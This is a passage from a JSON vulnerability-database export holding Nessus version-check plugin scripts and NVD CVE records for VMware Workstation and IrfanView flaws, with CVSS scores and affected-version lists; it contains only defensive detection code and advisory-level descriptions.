'4.3.3.0';\n\nkb_base = 'SMB/IrfanView/';\nappname = \"IrfanView \" + plugin + \" plugin\";\npath = get_kb_item_or_exit(kb_base + 'Path');\n\npath += \"\\Plugins\\\" + plugin;\nplugin_version = get_kb_item_or_exit(kb_base + 'Plugin_Version/' + plugin);\n\nif (ver_compare(ver:plugin_version, fix:fix) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + plugin_version +\n '\\n Fixed version : ' + fix + ' (4.33)\\n';\n security_warning(port:get_kb_item('SMB/transport'), extra:report);\n }\n else security_warning(get_kb_item('SMB/transport'));\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, appname, plugin_version);\n\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T07:00:22", "description": "The version of VMware Workstation installed on the remote Windows host\nis 10.x prior to 10.0.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An unspecified flaw exists that allows a local attacker\n to escalate privileges or cause a denial of service\n via an arbitrary write to a file. (CVE-2014-8370)\n\n - An input validation error exists in the Host Guest File\n System (HGFS) that allows a local attacker to cause a\n denial of service of the guest operating system.\n (CVE-2015-1043)\n\n - An input validation error exists in the VMware\n Authorization process (vmware-authd) that allows a\n remote attacker to cause a denial of service of the host\n operating system. (CVE-2015-1044)\n\n - A denial of service vulnerability exists due to improper\n validation of user-supplied input to a remote procedure\n call (RPC) command. An unauthenticated, remote attacker\n can exploit this, via a crafted command, to crash the\n host or guest operating systems. (CVE-2015-2341)", "edition": 25, "published": "2015-02-05T00:00:00", "title": "VMware Workstation 10.x < 10.0.5 Multiple Vulnerabilities (VMSA-2015-0001 / VMSA-2015-0004) (Windows)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2341", "CVE-2015-1044", "CVE-2014-8370", "CVE-2015-1043"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:vmware:workstation"], "id": "VMWARE_WORKSTATION_MULTIPLE_VMSA_2015_0001.NASL", "href": "https://www.tenable.com/plugins/nessus/81187", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81187);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/11/25\");\n\n script_cve_id(\n \"CVE-2014-8370\",\n \"CVE-2015-1043\",\n \"CVE-2015-1044\",\n \"CVE-2015-2341\"\n );\n script_bugtraq_id(\n 72336,\n 72337,\n 72338,\n 75094\n );\n script_xref(name:\"VMSA\", value:\"2015-0001\");\n script_xref(name:\"VMSA\", value:\"2015-0004\");\n\n script_name(english:\"VMware Workstation 10.x < 10.0.5 Multiple Vulnerabilities (VMSA-2015-0001 / VMSA-2015-0004) (Windows)\");\n script_summary(english:\"Checks the VMware Workstation version.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a virtualization application installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of VMware Workstation installed on the remote Windows host\nis 10.x prior to 10.0.5. It is, therefore, affected by multiple\nvulnerabilities :\n\n - An unspecified flaw exists that allows a local attacker\n to escalate privileges or cause a denial of service\n via an arbitrary write to a file. (CVE-2014-8370)\n\n - An input validation error exists in the Host Guest File\n System (HGFS) that allows a local attacker to cause a\n denial of service of the guest operating system.\n (CVE-2015-1043)\n\n - An input validation error exists in the VMware\n Authorization process (vmware-authd) that allows a\n remote attacker to cause a denial of service of the host\n operating system. (CVE-2015-1044)\n\n - A denial of service vulnerability exists due to improper\n validation of user-supplied input to a remote procedure\n call (RPC) command. An unauthenticated, remote attacker\n can exploit this, via a crafted command, to crash the\n host or guest operating systems. (CVE-2015-2341)\");\n # http://lists.vmware.com/pipermail/security-announce/2015/000286.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3bded33c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0001.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.vmware.com/security/advisories/VMSA-2015-0004.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to VMware Workstation version 10.0.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-8370\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vmware:workstation\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vmware_workstation_detect.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\", \"VMware/Workstation/Version\", \"VMware/Workstation/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\n\nappname = 'VMware Workstation';\n\nversion = get_kb_item(\"VMware/Workstation/Version\");\nif (isnull(version)) audit(AUDIT_NOT_INST, appname);\n\npath = get_kb_item_or_exit(\"VMware/Workstation/Path\");\n\nfix = \"10.0.5\";\nif (version =~ \"^10\\.\" && ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity >0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix + '\\n';\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, appname, version, path);\n", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "cve": [{"lastseen": "2020-10-03T12:49:49", "description": "TPInt.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 11.1.1, VMware Player 6.x before 6.0.6 and 7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to cause a host OS denial of service via unspecified vectors.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2340", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2340"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2340", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2340", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "VMware Workstation 10.x before 10.0.5, VMware Player 6.x before 6.0.6, and VMware Fusion 6.x before 6.0.6 and 7.x before 7.0.1 allow attackers to cause a denial of service against a 32-bit guest OS or 64-bit host OS via a crafted RPC command.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2341", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2341"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:fusion:7.1.1", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:fusion:7.1.0", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.4"], "id": "CVE-2015-2341", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2341", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "TPview.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 11.1.1, VMware Player 6.x before 6.0.6 and 7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to cause a host OS denial of service via unspecified vectors, a different vulnerability than CVE-2015-2338.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2339", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2339"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2339", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2339", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:49:49", "description": "TPview.dll in VMware Workstation 10.x before 10.0.6 and 11.x before 11.1.1, VMware Player 6.x before 6.0.6 and 7.x before 7.1.1, and VMware Horizon Client 3.2.x before 3.2.1, 3.3.x, and 5.x local-mode before 5.4.2 on Windows does not properly allocate memory, which allows guest OS users to cause a host OS denial of service via unspecified vectors, a different vulnerability than CVE-2015-2339.", "edition": 3, "cvss3": {}, "published": "2015-06-13T14:59:00", "title": "CVE-2015-2338", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.1, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2338"], "modified": "2016-12-31T02:59:00", "cpe": ["cpe:/a:vmware:player:6.0.4", "cpe:/a:vmware:fusion:6.0.3", "cpe:/a:vmware:player:6.0", "cpe:/a:vmware:player:6.0.5", "cpe:/a:vmware:player:6.0.2", "cpe:/a:vmware:workstation:10.0", "cpe:/a:vmware:workstation:10.0.2", "cpe:/a:vmware:player:7.0", "cpe:/a:vmware:fusion:7.0", "cpe:/a:vmware:fusion:6.0.5", "cpe:/a:vmware:player:7.1", "cpe:/a:vmware:workstation:10.0.1", "cpe:/a:vmware:fusion:6.0.1", "cpe:/a:vmware:horizon_view_client:5.4.1", "cpe:/a:vmware:fusion:6.0", "cpe:/a:vmware:horizon_view_client:5.4", "cpe:/a:vmware:player:6.0.1", "cpe:/a:vmware:player:6.0.3", "cpe:/a:vmware:workstation:10.0.3", "cpe:/a:vmware:workstation:11.1", "cpe:/a:vmware:fusion:7.0.1", "cpe:/a:vmware:fusion:6.0.4", "cpe:/a:vmware:horizon_client:3.2.0", "cpe:/a:vmware:fusion:6.0.2", "cpe:/a:vmware:workstation:10.0.5", "cpe:/a:vmware:workstation:10.0.4", "cpe:/a:vmware:workstation:11.0", "cpe:/a:vmware:horizon_client:3.3"], "id": "CVE-2015-2338", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2338", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:a:vmware:player:7.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_client:3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:horizon_view_client:5.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:fusion:6.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workstation:10.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:player:6.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:47:17", "description": "Stack-based buffer overflow in the JPEG2000 plugin in IrfanView PlugIns before 4.33 allows remote attackers to execute arbitrary code via a JPEG2000 (JP2) file with a crafted Quantization Default (QCD) marker segment.", "edition": 5, "cvss3": {}, "published": "2012-01-20T17:55:00", "title": "CVE-2012-0897", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0897"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:irfanview:irfanview:2.50", "cpe:/a:irfanview:irfanview:3.30", "cpe:/a:irfanview:irfanview:3.99", "cpe:/a:irfanview:irfanview:3.15", "cpe:/a:irfanview:irfanview:2.25", "cpe:/a:irfanview:irfanview:3.80", "cpe:/a:irfanview:irfanview:2.97", "cpe:/a:irfanview:irfanview:3.12", "cpe:/a:irfanview:irfanview:2.85", "cpe:/a:irfanview:irfanview:2.62", "cpe:/a:irfanview:irfanview:3.00", "cpe:/a:irfanview:irfanview:2.10", "cpe:/a:irfanview:irfanview:2.32", "cpe:/a:irfanview:irfanview:2.20", "cpe:/a:irfanview:irfanview:2.52", "cpe:/a:irfanview:irfanview:2.40", "cpe:/a:irfanview:irfanview:2.05", "cpe:/a:irfanview:irfanview:3.05", "cpe:/a:irfanview:irfanview:1.99", "cpe:/a:irfanview:irfanview:1.75", "cpe:/a:irfanview:irfanview:3.70", "cpe:/a:irfanview:irfanview:4.27", "cpe:/a:irfanview:irfanview:3.02", "cpe:/a:irfanview:irfanview:2.68", "cpe:/a:irfanview:irfanview:4.10", "cpe:/a:irfanview:irfanview:3.95", "cpe:/a:irfanview:irfanview:2.18", "cpe:/a:irfanview:irfanview:3.98", "cpe:/a:irfanview:irfanview:3.33", "cpe:/a:irfanview:irfanview:3.90", "cpe:/a:irfanview:irfanview:4.28", "cpe:/a:irfanview:irfanview:4.32", "cpe:/a:irfanview:irfanview:3.0.7", "cpe:/a:irfanview:irfanview:3.60", "cpe:/a:irfanview:irfanview:2.65", "cpe:/a:irfanview:irfanview:3.51", "cpe:/a:irfanview:irfanview:1.80", "cpe:/a:irfanview:irfanview:3.21", "cpe:/a:irfanview:irfanview:1.70", "cpe:/a:irfanview:irfanview:2.55", "cpe:/a:irfanview:irfanview:2.95", "cpe:/a:irfanview:irfanview:2.63", "cpe:/a:irfanview:irfanview:2.17", "cpe:/a:irfanview:irfanview:2.92", "cpe:/a:irfanview:irfanview:4.20", "cpe:/a:irfanview:irfanview:3.07", "cpe:/a:irfanview:irfanview:2.90", "cpe:/a:irfanview:irfanview:3.50", "cpe:/a:irfanview:irfanview:1.85", "cpe:/a:irfanview:irfanview:2.35", "cpe:/a:irfanview:irfanview:1.98a", "cpe:/a:irfanview:irfanview:3.75", "cpe:/a:irfanview:irfanview:2.07", "cpe:/a:irfanview:irfanview:4.25", "cpe:/a:irfanview:irfanview:3.17", "cpe:/a:irfanview:irfanview:2.30", "cpe:/a:irfanview:irfanview:4.00", "cpe:/a:irfanview:irfanview:3.20", "cpe:/a:irfanview:irfanview:3.97", "cpe:/a:irfanview:irfanview:2.66", "cpe:/a:irfanview:irfanview:2.22", "cpe:/a:irfanview:irfanview:4.22", "cpe:/a:irfanview:irfanview:2.12", "cpe:/a:irfanview:irfanview:3.35", "cpe:/a:irfanview:irfanview:2.82", "cpe:/a:irfanview:irfanview:3.92", "cpe:/a:irfanview:irfanview:3.25", "cpe:/a:irfanview:irfanview:3.85", "cpe:/a:irfanview:irfanview:2.00", "cpe:/a:irfanview:irfanview:4.30", "cpe:/a:irfanview:irfanview:2.83", "cpe:/a:irfanview:irfanview:3.10", "cpe:/a:irfanview:irfanview:1.98", "cpe:/a:irfanview:irfanview:2.27", "cpe:/a:irfanview:irfanview:2.37", "cpe:/a:irfanview:irfanview:2.15", "cpe:/a:irfanview:irfanview:1.90", "cpe:/a:irfanview:irfanview:3.91", "cpe:/a:irfanview:irfanview:1.97", "cpe:/a:irfanview:irfanview:2.98", "cpe:/a:irfanview:irfanview:3.61", "cpe:/a:irfanview:irfanview:4.23", "cpe:/a:irfanview:irfanview:2.80", "cpe:/a:irfanview:irfanview:2.60", "cpe:/a:irfanview:irfanview:1.95", "cpe:/a:irfanview:irfanview:3.36"], "id": "CVE-2012-0897", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0897", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:irfanview:irfanview:3.33:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.15:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.55:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.98:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:3.90:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:1.99:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:2.35:*:*:*:*:*:*:*", "cpe:2.3:a:irfanview:irfanview:4.25:*:*:*:*:*:*:*", 